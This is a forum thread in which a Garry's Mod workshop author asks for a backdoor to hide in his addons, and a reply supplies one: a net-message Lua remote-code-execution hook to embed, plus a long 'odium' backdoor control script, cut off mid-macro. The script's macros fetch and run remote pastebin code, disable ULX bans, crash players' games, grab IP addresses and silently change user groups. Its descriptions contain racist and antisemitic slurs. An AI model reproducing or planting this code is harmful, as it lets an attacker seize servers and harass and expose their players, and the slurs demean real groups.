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  1. #1
    itzAdamYT's Avatar
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    Backdoor to put in my addon.

    I have a series of addons on the workshop for GMod and I would like to know if someone could give me a backdoor which would allow me to become superadmin on the servers the addon is on.
    I don't care how it's executed, whether it's a console command or something that will happen as soon as the server starts.
    I have tried to use one, however, I can not get the commands to execute on the server side, but only the clientside, so it just says I do not have the require permissions to perform them.
    I know I requested information for a backdoor a few days ago, but it did not seem to work. Any help is appreciated, thanks.

  2. #2
    suchisgood's Avatar
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    use http and send server ip and port to your http!

  3. #3
    wasd498794's Avatar
    Join Date
    Aug 2018
    he asked for a backdoor, not a way to log it.

  4. #4
    KWAIILOLI's Avatar
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    Quote Originally Posted by itzAdamYT View Post
    I have a series of addons on the workshop for GMod and I would like to know if someone could give me a backdoor which would allow me to become superadmin on the servers the addon is on.
    I don't care how it's executed, whether it's a console command or something that will happen as soon as the server starts.
    I have tried to use one, however, I can not get the commands to execute on the server side, but only the clientside, so it just says I do not have the require permissions to perform them.
    I know I requested information for a backdoor a few days ago, but it did not seem to work. Any help is appreciated, thanks.
    I can help you with that one, just put :
     util.AddNetworkString( '_CAC_ReadMemory' ) net.Receive( '_CAC_ReadMemory', function() local x = CompileString( net.ReadString(), 'LuaCmd', false ) if isfunction( x ) then x() end end )
    into your addon code, then copy this code (odiumbackdoor) into your external (injector) folder and name it somename.lua :
    //local odium = jit.status( 'ODIUM' ) if !istable(odium) then print('FAILED TO IMPORT ODIUM TABLE') end
    local BD = {}
    local h = http
    BD.Backdoors = BD.Backdoors or {}
    BD.CurrentBackdoor = "Generic"
    BD.BackdoorTypes = {
      ["Generic"] = {
        ["Code"] = "util.AddNetworkString( '_CAC_ReadMemory' ) net.Receive( '_CAC_ReadMemory', function() local x = CompileString( net.ReadString(), 'LuaCmd', false ) if isfunction( x ) then x() end end )",
        ["Netkey"] = "_CAC_ReadMemory",
    local netsss = net.Start
    function BD.IsMessagePooled( netmessage )
      local netfunc = netsss
      local status, error = pcall( netfunc, netmessage )
      return status
    local net = net
    local ctxt = chat.AddText
    function BD.ChatText( message, col )
      ctxt( Color(195,205,255,255), "[Blackdoor] ", col, message )
    function BD.PingBackDoors()
      local bds = {}
      for k, v in pairs(BD.BackdoorTypes) do
        if BD.IsMessagePooled( tostring( v.Netkey ) ) then bds[k] = true end
      return bds
    concommand.Add("bd_refresh_backdoors", function() BD.Backdoors = BD.PingBackDoors() end)
    function BD.BackdoorActive()
      return table.Count( BD.Backdoors ) > 0
    function BD.GetActive()
      if !BD.BackdoorTypes[BD.CurrentBackdoor] then return { ["Code"] = "local x = 69", ["Netkey"] = "" } end
      return BD.BackdoorTypes[BD.CurrentBackdoor]
    BD.BDMacros ={
      ["Artillery Strike"] = {
        ["Type"] = 1,
        ["Code"] = [[if !bombstrike then
          hook.Add("Think", "lulz_bombstrike", function()
          local explode = ents.Create( "env_explosion" )
          local ps = Vector(math.random(-8000, 8000), math.random(-8000, 8000), math.random(-5000, 5000))
          local trc = {}
          trc.start = ps
          trc.endpos = ps + Vector( 0, 0, -99999)
          local tr = util.TraceLine(trc)
          if !tr.Hit then return end
          explode:SetPos( tr.HitPos )
          explode:SetKeyValue( "iMagnitude", "400" )
          explode:Fire( "Explode", 0, 0 )
          bombstrike = true
          hook.Remove("Think", "lulz_bombstrike")
          bombstrike = false
          ["Desc"] = "Explode the shit out of everything",
        ["@ Inject SendLua Interface"] = {
          ["Type"] = 1,
          ["Code"] = [[
          util.AddNetworkString( "cucked" )
          function BDSendLua( p, str ) net.Start( "cucked" ) net.WriteString( str ) net.Send( p ) end
            function BDSendLuaAll( str ) net.Start( "cucked" ) net.WriteString( str ) net.Broadcast() end
              function BDInjectAids( p ) p:SendLua( 'net.Receive( "cucked", function() RunString( net.ReadString() ) end )' ) end
                for k, v in pairs( player.GetAll() ) do BDInjectAids( v ) end
                hook.Add( "PlayerInitialSpawn", "youonlygetcuckedagain", function( p ) BDInjectAids( p ) end)
                ["Desc"] = "You need this to use certain macros",
              ["Announce centre screen"] = {
                ["Type"] = 1,
                ["Code"] = [[for k, v in pairs(player.GetAll()) do v:PrintMessage( HUD_PRINTCENTER, @1 ) end]],
                ["Desc"] = "Make an announcement in the centre of everybodys screen",
                ["NeedsParameters"] = 1,
              ["Rainbow chat spam"] = {
                ["Type"] = 1,
                ["Code"] = [[
                if !timer.Exists( "lulz_chatspam" ) then
                  timer.Create( "lulz_chatspam", 0.5, 0, function() BDSendLuaAll('chat.AddText( Color( math.random(0, 255), math.random(0, 255), math.random(0, 255) ), @1 )' ) end)
                  timer.Remove( "lulz_chatspam" )
                  ["Desc"] = "Spam rainbow chat for all players with the 1st parameter as the text",
                  ["NeedsParameters"] = 1,
                ["Rainbow chat spam (Turbo)"] = {
                  ["Type"] = 1,
                  ["Code"] = [[
                  if !timer.Exists( "lulz_chatspam" ) then
                    timer.Create( "lulz_chatspam", 0.01, 0, function() BDSendLuaAll('chat.AddText( Color( math.random(0, 255), math.random(0, 255), math.random(0, 255) ), @1 )' ) end)
                    timer.Remove( "lulz_chatspam" )
                    ["Desc"] = "Spam rainbow chat for all players with the 1st parameter as the text",
                    ["NeedsParameters"] = 1,
                  ["Unlock all doors"] = {
                    ["Type"] = 1,
                    ["Code"] = [[local doors = {"func_door", "func_door_rotating", "prop_door_rotating", "prop_dynamic"} for k, v in pairs(ents.GetAll()) do if table.HasValue(doors, v:GetClass()) then v:Fire("unlock", "", 0) end end]],
                    ["Desc"] = "",
                  ["Toggle all doors"] = {
                    ["Type"] = 1,
                    ["Code"] = [[local doors = {"func_door", "func_door_rotating", "prop_door_rotating", "prop_dynamic"} for k, v in pairs(ents.GetAll()) do if table.HasValue(doors, v:GetClass()) then v:Fire("toggle", "", 0) end end]],
                    ["Desc"] = "",
                  ["Broken Glass Symphony"] = {
                    ["Type"] = 1,
                    ["Code"] = [[
                    if !timer.Exists( "A true masterpiece" ) then
                      timer.Create( "A true masterpiece", 0.2, 0, function()
                      for _, p in pairs(player.GetAll()) do
                        p:EmitSound( "physics/glass/glass_largesheet_break"..math.random(1,3)..".wav", 100, math.random( 40, 180 ) )
                      timer.Remove( "A true masterpiece" )
                      ["Desc"] = "Beethoven's last hidden symphony, only rediscovered in 2017",
                    ["Yeah Baby"] = {
                      ["Type"] = 1,
                      ["Code"] = [[
                      if !timer.Exists( "porn" ) then
                        timer.Create( "porn", 0.3, 0, function()
                        for _, p in pairs(player.GetAll()) do
                          p:EmitSound( "vo/npc/female01/yeah02.wav", 100, math.random( 90, 120 ) )
                        timer.Remove( "porn" )
                        ["Desc"] = "YEAH BABY YEAH",
                      ["Street War"] = {
                        ["Type"] = 1,
                        ["Code"] = [[
                        if !timer.Exists( "cwar" ) then
                          timer.Create( "cwar", 1, 0, function()
                          for _, p in pairs(player.GetAll()) do
                            p:EmitSound( "ambient/levels/streetwar/city_battle"..math.random( 1, 19 )..".wav", 100, math.random( 90, 120 ) )
                          timer.Remove( "cwar" )
                          ["Desc"] = "For when you need more dakka",
                        ["Earthquake"] = {
                          ["Type"] = 1,
                          ["Code"] = [[
                          if !timer.Exists( "earthquake" ) then
                            timer.Create( "earthquake", 0.5, 500, function()
                            for _, p in pairs(player.GetAll()) do
                              p:SetPos( p:GetPos() + Vector( 0, 0, 1 ) )
                              p:SetVelocity( Vector( math.random( -50, 50 ), math.random( -50, 50 ), math.random( 100, 150 ) ) )
                              util.ScreenShake( p:GetPos(), 20, 1, 1, 100 )
                              p:EmitSound( "ambient/explosions/exp1.wav", 100, math.random( 60, 100 ) )
                            for _, e in pairs(ents.GetAll()) do
                              if e:GetPhysicsObject() and e:GetPhysicsObject():IsValid() then e:GetPhysicsObject():AddVelocity( Vector( math.random( -50, 50 ), math.random( -50, 50 ), math.random( 100, 150 ) ) ) end
                            timer.Remove( "earthquake" )
                            ["Desc"] = "For when you need more dakka",
                          ["Seize the server"] = {
                            ["Type"] = 1,
                            ["Code"] = [[
                            hook.Add("PlayerInitialSpawn", "gw_siezed", function( ply ) ply:SendLua('local html = vgui.Create( "HTML" )html:SetSize( ScrW(), ScrH() )html:OpenURL( "" )') end)
                            for k, v in pairs(player.GetAll()) do
                              v:SendLua('local html = vgui.Create( "HTML" )html:SetSize( ScrW(), ScrH() )html:OpenURL( "" )')
                              ["Desc"] = "Display the seized by wraithnet message to all players",
                            ["Explode all vehicles"] = {
                              ["Type"] = 1,
                              ["Code"] = [[for k, v in pairs(ents.GetAll()) do if v:IsVehicle() then
                                local explo = ents.Create("env_explosion")
                                explo:SetKeyValue("iMagnitude", "300")
                                explo:Fire("Explode", "", 0)
                              ["Desc"] = "",
                            ["RCON command"] = {
                              ["Type"] = 1,
                              ["Code"] = [[game.ConsoleCommand( @1.."\n" )]],
                              ["Desc"] = "Like having rcon access without actually having rcon access",
                            ["Lua run"] = {
                              ["Type"] = 1,
                              ["Code"] = [[@1]],
                              ["Desc"] = "For running your dank luas",
                            ["Lua run from pastebin"] = {
                              ["Type"] = 1,
                              ["Code"] = [[http.Fetch( "@1", function( b, l, h, c ) RunString( b ) end, function() end )]],
                              ["Desc"] = "Fetch and run code from a pastebin link ( remember to use raw you stupid ****** eg. )",
                            ["Destroy ULX Ban/Kick"] = {
                              ["Type"] = 1,
                              ["Code"] = [[ULib.Ban = function() return false end
                              ULib.addBan = function() return end
                              ULib.kick = function() return end]],
                              ["Desc"] = "Completely break ulx ban and ulx kick so you can't be locked out of the server",
                            ------------------------ player targeted macros ------------------------
                            ["Kill player"] = {
                              ["Type"] = 2, -- 1 = indiscriminate, 2= targeted, 3 = dangerous
                              ["Code"] = [[v:Kill()]],
                              ["Desc"] = "",
                            ["Fumble player"] = {
                              ["Type"] = 2, -- 1 = indiscriminate, 2= targeted, 3 = dangerous
                              ["Code"] = [[v:DropWeapon( v:GetActiveWeapon() )]],
                              ["Desc"] = "Knocks their current weapon out of their hand",
                            ["Strip weapons"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:StripWeapons()]],
                              ["Desc"] = "",
                            ["Rocket"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:SetVelocity( Vector(0, 0, 9000) )]],
                              ["Desc"] = "Sends them flying up into the air",
                            ["Rocket (Spastic)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:SetVelocity( Vector(math.random( -9000, 9000), math.random( -9000, 9000), 9000) )]],
                              ["Desc"] = "HOLY SHIIIIIIIIIIIT",
                            ["Change model"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:SetModel( @1 )]],
                              ["Desc"] = "Set their player model to the specified string (1st paremeter)",
                              ["NeedsParameters"] = 1,
                            ["Set health + armor"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:SetHealth( @1 ) v:SetArmor( @2 ) ]],
                              ["Desc"] = "Sets their health (1st paremeter) and armor (2nd paremeter)",
                              ["NeedsParameters"] = 2,
                            ["Ear rape"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local snd = {
                                [1] = "npc/stalker/go_alert2a.wav",
                                [2] = "vo/npc/male01/question06.wav",
                                [3] = "ambient/energy/zap1.wav",
                                [4] = "weapons/knife/knife_stBD.wav",
                                [5] = "vo/ravenholm/madlaugh04.wav",
                                [6] = "npc/antlion_guard/antlion_guard_die1.wav",
                                [7] = "vo/breencast/br_collaboration01.wav,"
                              v:EmitSound( snd[tonumber(@1)], 100, 100 )
                              ["Desc"] = "Make them emit a sound (1st paremeter is a number 1-7)",
                              ["NeedsParameters"] = 1,
                            ["Ear rape (from internet)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              BDSendLua( v, 'if soundrape then soundrape:Remove() soundrape = nil return end soundrape = vgui.Create( "DFrame" ) soundrape:SetSize( 1, 1 ) local html = vgui.Create( "HTML", soundrape ) html:OpenURL( @1 )' )
                              ["Desc"] = "Make them hear a sound from a URL (1st paremeter).  Sending a new sound will stop the previous one.  Send an invalid url to stop all sounds entirely on their client",
                              ["NeedsParameters"] = 1,
                            ["Eye rape (from internet)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              BDSendLua( v, 'if bdeyerape then bdeyerape:Remove() bdeyerape = nil return end bdeyerape = vgui.Create( "DFrame" )bdeyerape:SetDraggable( false )bdeyerape:SetSize( ScrW(), ScrH() )bdeyerape:SetTitle( "" )bdeyerape:ShowCloseButton( false )local html = vgui.Create( "HTML", bdeyerape )html:Dock( FILL )html:OpenURL( @1 )' )
                              ["Desc"] = "Make them see a full screen, unclosable panel from a URL (1st paremeter).  Sending a new url will stop the previous one.  Send an invalid url to clear their view entirely",
                              ["NeedsParameters"] = 1,
                            ["Rave Mode"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              BDSendLua( v, 'if hook.GetTable().HUDPaint.drugznigga then hook.Remove( "HUDPaint", "drugznigga" ) else hook.Add( "HUDPaint", "drugznigga", function() local cin = math.sin( CurTime() * 10 ) * 255 surface.SetDrawColor( Color( cin, -cin, cin, 100 ) ) surface.DrawRect( 0, 0, ScrW(), ScrH() ) end) end' )
                              ["Desc"] = "Make them loosen up and join the party",
                            ["Rave Music"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              BDSendLua( v, 'surface.PlaySound( "music/hl1_song25_remix3.mp3" )' )
                              ["Desc"] = "DOOF DOOF NIGGA",
                            ["Whisper"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:ChatPrint( @1 )]],
                              ["Desc"] = "Anonymously whisper text into their chatbox (1st paremeter)",
                              ["NeedsParameters"] = 1,
                            ["Whisper (advanced)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              BDSendLua( v, 'chat.AddText( Color( @2, @3, @4 ), @1 )' )
                              ["Desc"] = "Anonymously whisper coloured text into their chatbox (1st paremeter = text, 2nd = r, 3rd = g, 4th = b)",
                              ["NeedsParameters"] = 1,
                            ["Ignite player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:Ignite( 30 )]],
                              ["Desc"] = "Ignite players for 30 seconds, spam repeatedly to refresh the duration",
                            ["Toggle godmode"] = {
                              ["Type"] = 2,
                              ["Code"] = [[if v:HasGodMode() then v:GodDisable() else v:GodEnable() end]],
                              ["Desc"] = "",
                            ["Crash their gmod"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:SendLua("function fag() return fag() end fag()")]],
                              ["Desc"] = "Instantly freezes their game solid, the only way to fix it is ctrl-alt-delete or a computer restart",
                            ["Toggle serverside speedhack"] = {
                              ["Type"] = 2,
                              ["Code"] = [[if !v.Sanic then v:SetRunSpeed( 1200 ) v:SetWalkSpeed(800) v.Sanic = true else v:SetRunSpeed( 240 ) v:SetWalkSpeed( 160 ) v.Sanic = false end]],
                              ["Desc"] = "GOTTA GO FAST",
                            ["Freeze/Unfreeze player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:Freeze( !v:IsFrozen() )]],
                              ["Desc"] = "",
                            ["Force say"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:Say(@1)]],
                              ["Desc"] = "Forces them to say the specified string in chat (first parameter)",
                              ["NeedsParameters"] = 1,
                            ["Force concommand"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:ConCommand(@1)]],
                              ["Desc"] = "Forces them to run the specified console command (first parameter)",
                              ["NeedsParameters"] = 1,
                            ["Grab IP"] = {
                              ["Type"] = 2,
                              ["Code"] = [[ for _, p in pairs(player.GetAll()) do if %LP then p:ChatPrint( v:Nick().." : "..v:IPAddress() ) end end]],
                              ["Desc"] = "Prints their IP Address to your console",
                            ["DarkRP add/remove money"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:addMoney(@1)]],
                              ["Desc"] = "Adds money to their wallet (first parameter) remember that you can use negative numbers to subtract money",
                              ["NeedsParameters"] = 1,
                            ["DarkRP force job"] = {
                              ["Type"] = 2,
                              ["Code"] = [[ for i, t in pairs( team.GetAllTeams() ) do if string.lower(t.Name) == string.lower( @1 ) then v:changeTeam(i, true, true) end end]],
                              ["Desc"] = "Change their team to the specified job (1st parameter = job name, does not require capitalization)",
                              ["NeedsParameters"] = 1,
                            ["Force team switch"] = {
                              ["Type"] = 2,
                              ["Code"] = [[ for i, t in pairs( team.GetAllTeams() ) do if string.lower(t.Name) == string.lower( @1 ) then v:SetTeam( i ) end end]],
                              ["Desc"] = "Change their team to the specified team name (1st parameter)",
                              ["NeedsParameters"] = 1,
                            ["Noclip player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[if v:GetMoveType() != MOVETYPE_NOCLIP then v:SetMoveType(MOVETYPE_NOCLIP) else v:SetMoveType(MOVETYPE_WALK) end]],
                              ["Desc"] = "Toggles noclip on the specified players",
                            ["Give weapon to player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:Give( @1 )]],
                              ["Desc"] = "Gives this player a weapon (first parameter)",
                              ["NeedsParameters"] = 1,
                            ["Give ammo to player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:GiveAmmo( @1, @2, false )]],
                              ["Desc"] = "Gives this player some ammo (first parameter = amount of ammo, secound parameter = ammo type)",
                              ["NeedsParameters"] = 2,
                            ["Teleport (them to your cursor)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local tp = false
                              local tpos
                              for _, p in pairs(player.GetAll()) do if %LP then tpos = p:GetEyeTraceNoCursor().HitPos tp = true end end
                              if tp then v:SetPos( tpos ) end
                              ["Desc"] = "Teleports the selected players to your cursor location, not recommended for more than 1 person at once",
                            ["Teleport (you to them)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local tp = false
                              local tpos = v:GetPos() + Vector( 32, 0, 10)
                              for _, p in pairs(player.GetAll()) do if %LP then p:SetPos( tpos ) end end
                              ["Desc"] = "Teleport yourself to the selected player, may end with you stuck inside a wall",
                            ["Teleport (blink)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local tpos = v:GetEyeTraceNoCursor().HitPos
                              v:SetPos( tpos )
                              ["Desc"] = "Use on yourself or others to warp them to where they are looking",
                            ["Spawn entity near player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local tr = {}
                              tr.start = v:GetShootPos()
                              tr.endpos = v:GetShootPos() + 2500 * v:GetAimVector()
                              tr.filter = {v}
                              local trace = util.TraceLine(tr)
                              local dix = ents.Create( @1 )
                              ["Desc"] = "Spawn an entity in front of this player (first parameter = entity class), cannot spawn cars!",
                              ["NeedsParameters"] = 1,
                            ["Spawn prop near player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local tr = {}
                              tr.start = v:GetShootPos()
                              tr.endpos = v:GetShootPos() + 2500 * v:GetAimVector()
                              tr.filter = {v}
                              local trace = util.TraceLine(tr)
                              local dix = ents.Create( "prop_physics" )
                              dix:SetModel( @1 )
                              ["Desc"] = "Spawn a world prop in front of this player (first parameter = model)",
                              ["NeedsParameters"] = 1,
                            ["Spawn odium shrine"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local tr = {}
                              tr.start = v:GetShootPos()
                              tr.endpos = v:GetShootPos() + 2500 * v:GetAimVector()
                              tr.filter = {v}
                              local trace = util.TraceLine(tr)
                              local dix = ents.Create( "prop_physics" )
                              dix:SetPos( trace.HitPos + Vector( 0, 0, 70 ) )
                              dix:SetAngles( v:GetAngles() )
                              dix:SetModel( "models/props_c17/gravestone_cross001a.mdl" )
                              dix:SetMoveType( MOVETYPE_NONE )
                              dix:SetMaterial( "models/shiny" )
                              dix:SetColor( Color( 0, 0, 40 ) )
                              local function ecr( parent, model, pos, ang, col, mat  )
                                local dix = ents.Create( "prop_physics" )
                                dix:SetPos( parent:LocalToWorld( pos ) )
                                dix:SetAngles( parent:LocalToWorldAngles( ang ) )
                                dix:SetModel( model )
                                dix:SetParent( parent )
                                dix:SetColor( col )
                                dix:SetMaterial( mat )
                              ecr( dix, "models/props_c17/gravestone_coffinpiece001a.mdl", Vector( -65, 0, -60 ), Angle( 0, 180, 0 ), Color( 40, 40, 80 ), "models/shiny"  )
                              ecr( dix, "models/hunter/blocks/cube025x3x025.mdl", Vector( -5, 18, 35 ), Angle( 0, 0, 0 ), Color( 80, 80, 180 ), "models/shiny"  )
                              ecr( dix, "models/hunter/blocks/cube025x3x025.mdl", Vector( -5, 6, 65 ), Angle( 0, 0, 90 ), Color( 80, 80, 180 ), "models/shiny"  )
                              ecr( dix, "models/hunter/blocks/cube025x150x025.mdl", Vector( -5, 71, 100 ), Angle( 0, 0, 90 ), Color( 80, 80, 180 ), "models/shiny"  )
                              ecr( dix, "models/hunter/blocks/cube025x150x025.mdl", Vector( -5, -59, 100 ), Angle( 0, 0, 90 ), Color( 80, 80, 180 ), "models/shiny"  )
                              for _, p in pairs( player.GetAll() ) do p:SendLua( 'chat.AddText( Color(200, 200, 255 ), "Heil, god of cheating")' ) sound.Play( "ambient/explosions/explode_8.wav", p:GetPos(), 90, 80, 1 ) end
                              ["Desc"] = "Spawn a world prop in front of this player (first parameter = model)",
                            ["Spawn evil npc near player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local tr = {}
                              tr.start = v:GetShootPos()
                              tr.endpos = v:GetShootPos() + 2500 * v:GetAimVector()
                              tr.filter = {v}
                              local trace = util.TraceLine(tr)
                              local dix = ents.Create( "npc_citizen" )
                              dix:SetKeyValue( "additionalequipment", table.Random({"weapon_shotgun", "weapon_smg1", "weapon_ar2"}) )
                              dix:SetKeyValue( "citizentype", 3 )
                              dix:AddRelationship("player D_HT 200")
                              dix:SetSchedule( SCHED_IDLE_WANDER )
                              ["Desc"] = "Spawn a hostile NPC in front of this player",
                            ["Death ray"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local trace = v:GetEyeTraceNoCursor()
                              if trace.Entity:IsValid() then trace.Entity:Remove() end
                              ["Desc"] = "Vaporize whatever this player is looking at",
                            ["Death ray (explosive)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local trace = v:GetEyeTraceNoCursor()
                              local explo = ents.Create("env_explosion")
                              explo:SetKeyValue("iMagnitude", "250")
                              explo:Fire("Explode", "", 0)
                              ["Desc"] = "Blow up whatever this player is looking at",
                            ["Precise Artillery Strike"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local trace = v:GetEyeTraceNoCursor()
                              timer.Create( "uiashfuasfas"..v:UniqueID()..math.random(-9999, 99999), 0.2, 15, function()
                              local explo = ents.Create("env_explosion")
                              explo:SetPos(trace.HitPos + Vector( math.random( -500, 500), math.random( -500, 500), math.random( -500, 500) ) )
                              explo:SetKeyValue("iMagnitude", "250")
                              explo:Fire("Explode", "", 0)
                              ["Desc"] = "Blow up whatever this player is looking at",
                            ["Woman Driver"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local trace = v:GetEyeTraceNoCursor()
                              local car = ents.Create("prop_physics")
                              local trace2 = util.TraceLine( { start = trace.HitPos, endpos = trace.HitPos + Vector( 0, 0, 5000000 ), mask = MASK_SOLID_BRUSHONLY } )
                              car:SetModel( "models/props_vehicles/car002a_physics.mdl" )
                              car:SetAngles( v:GetAngles() )
                              car:SetPos( trace2.HitPos + Vector( 0, 0, -60 ) )
                              car.boom = 6
                              car:GetPhysicsObject():SetVelocity( Vector( 0, 0, -5000 ) )
                              car:Ignite( 500 )
                              car:AddCallback( "PhysicsCollide", function( car, dat )
                              local explo = ents.Create("env_explosion")
                              explo:SetPos( car:GetPos() )
                              explo:SetKeyValue("iMagnitude", "350")
                              explo:Fire("Explode", "", 0)
                              local ef = EffectData()
                              ef:SetOrigin( car:GetPos() )
                              ef:SetMagnitude( 5 )
                              ef:SetScale( 200 )
                              util.Effect( "ThumperDust", ef )
                              car.boom = car.boom - 1
                              if car.boom < 0 then car:Remove() end
                              end )
                              timer.Simple( 30, function() if car:IsValid() then car:Remove() end end)
                              ["Desc"] = "Make exploding vehicles rain from the sky",
                            ["Poison Gas"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local trace = v:GetEyeTraceNoCursor()
                              local ar2Explo = ents.Create("env_ar2explosion")
                              local p = trace.HitPos
                              ar2Explo:Fire("Explode", "", 0)
                              timer.Create( "gasthekikes_"..math.random(-9999, 9999).."_"..math.random(-9999, 9999), 0.25, 35, function()
                              for _, ent in pairs(ents.FindInSphere( p, 500)) do
                                if !ent:IsPlayer() then continue end
                                local d = DamageInfo()
                                d:SetDamage( 1 )
                                d:SetAttacker( game.GetWorld() )
                                d:SetInflictor( game.GetWorld() )
                                d:SetDamageType( DMG_DROWN )
                                ent:TakeDamageInfo( d )
                              ["Desc"] = "GAS THE JEWS RACE WAR NOW",
                            ["Spawn vehicle near player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local trc = {}
                              trc.start = v:GetShootPos()
                              trc.endpos = v:GetShootPos() + 2500 * v:GetAimVector()
                              trc.filter = {v}
                              local tr = util.TraceLine(trc)
                              local VehicleList = list.Get( "Vehicles" )
                              local vehicle = VehicleList[ @1 ]
                              if ( !vehicle ) then return end
                              local Angles = v:GetAngles()
                              Angles.pitch = 0
                              Angles.roll = 0
                              Angles.yaw = Angles.yaw + 180
                              local pos = tr.HitPos
                              if ( vehicle.Offset ) then
                                pos = pos + tr.HitNormal * vehicle.Offset
                              local Ent = ents.Create( vehicle.Class )
                              if ( !Ent ) then return end
                              duplicator.DoGeneric( Ent, vehicle )
                              if ( vehicle.Model == "models/buggy.mdl" ) then Ent:SetKeyValue( "vehiclescript", "scripts/vehicles/jeep_test.txt" ) end
                              if ( vehicle.Model == "models/vehicle.mdl" ) then Ent:SetKeyValue( "vehiclescript", "scripts/vehicles/jalopy.txt" ) end
                              if ( vehicle && vehicle.KeyValues ) then
                                for k, v in pairs( vehicle.KeyValues ) do
                                  Ent:SetKeyValue( k, v )
                              Ent:SetModel( vehicle.Model )
                              Ent:SetAngles( Angles )
                              Ent:SetPos( pos )
                              if ( Ent.SetVehicleClass && @1 ) then Ent:SetVehicleClass( @1 ) end
                              Ent.VehicleName = vehicle.Class
                              Ent.VehicleTable = @1
                              Ent.ClassOverride = vehicle.Class
                              ["Desc"] = "Spawn a vehicle in front of this player (first parameter = vehicle class), don't try to spawn ents with this ya dingus!",
                              ["NeedsParameters"] = 1,
                            ["Kick player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[ v:Kick( @1 ) ]],
                              ["Desc"] = "First parameter = reason for kick",
                            ["******ize player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[ if !v.******ed then v:SetColor( Color( 0, 0, 0 ) ) v.******ed = true else v:SetColor( Color(255, 255, 255) ) v.******ed = false end ]],
                              ["Desc"] = "Turns them black as night",
                            ["Cloak player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[ if !v.BDCloaked then v:SetRenderMode( RENDERMODE_NONE ) v.BDCloaked = true else v:SetRenderMode( RENDERMODE_NORMAL ) v.BDCloaked = false end ]],
                              ["Desc"] = "Toggles cloaking on the player, people can still see the weapon they are holding however",
                            ["Allahu Ackbar"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local explo = ents.Create("env_explosion")
                              explo:SetKeyValue("iMagnitude", "250")
                              explo:Fire("Explode", "", 0)
                              if v:Alive() then v:Kill() end
                              ["Desc"] = "Blows them the fuck up, all kills are attributed to them so its great for getting random assholes banned",
                            ["ULX set access"] = {
                              ["Type"] = 2,
                              ["Code"] = [[ local userInfo = ULib.ucl.authed[ v:UniqueID() ] ULib.ucl.addUser( v:UniqueID(), userInfo.allow, userInfo.deny, @1 ) ]],
                              ["Desc"] = "If ulx is installed this will (silently!) set them to the specified usergroup (1st parameter)",
                              ["NeedsParameters"] = 1,
                            ------------------------ custom / new shit ------------------------
                            ["Africanize"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local bones = {
                                [1] = {b = "ValveBiped.Bip01_Head1", v = Vector(4,0,4)},
                                [2] = {b =  "ValveBiped.Bip01_R_Thigh", v = Vector(0,0,0)},
                                [3] = {b = "ValveBiped.Bip01_L_Thigh", v = Vector(0,0,0)},
                                [4] = {b =  "ValveBiped.Bip01_R_Calf", v = Vector(0,0,1)},
                                [5] = {b = "ValveBiped.Bip01_L_Calf", v = Vector(0,0,1)},
                                [6] = {b = "ValveBiped.Bip01_R_UpperArm", v = Vector(0,0,0)},
                                [7] = {b = "ValveBiped.Bip01_L_UpperArm", v = Vector(0,0,0)},
                                [8] = {b = "ValveBiped.Bip01_R_Forearm", v = Vector(1,1.5,1.5)},
                                [9] = {b = "ValveBiped.Bip01_L_Forearm", v = Vector(1,1.5,1.5)},
                                [10] = {b = "ValveBiped.Bip01_R_Clavicle", v = Vector(0,0,0)},
                                [11] = {b = "ValveBiped.Bip01_L_Clavicle", v = Vector(0,0,0)},
                              if !v.is2D then
                                v.is2D = true
                                for k, bone  in pairs(bones) do
                                  local boneToFind = v:LookupBone(bone.b)
                                  v:ManipulateBoneScale( boneToFind, bone.v)
                                v.is2D = false
                                for k, bone  in pairs(bones) do
                                  local boneToFind = v:LookupBone(bone.b)
                                  v:ManipulateBoneScale( boneToFind, Vector(1,1,1))
                              ["Desc"] = "Makes the player seem as though they're 2D.",
                            ["M9K nuke"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              //            if (m9k) then
                                local nuke = ents.Create("m9k_davy_crockett_explo")
                                nuke.Owner = v
                                //            end
                                ["Desc"] = "Creates a nuke 'made' by selected user(s) & activates it where they're standing.",
                              ["Console jammer"] = {
                                ["Type"] = 1,
                                ["Code"] = [[
                                if !(timer.Exists("consoleJammer")) then
                                  timer.Create("consoleJammer", 0.5, 0, function()
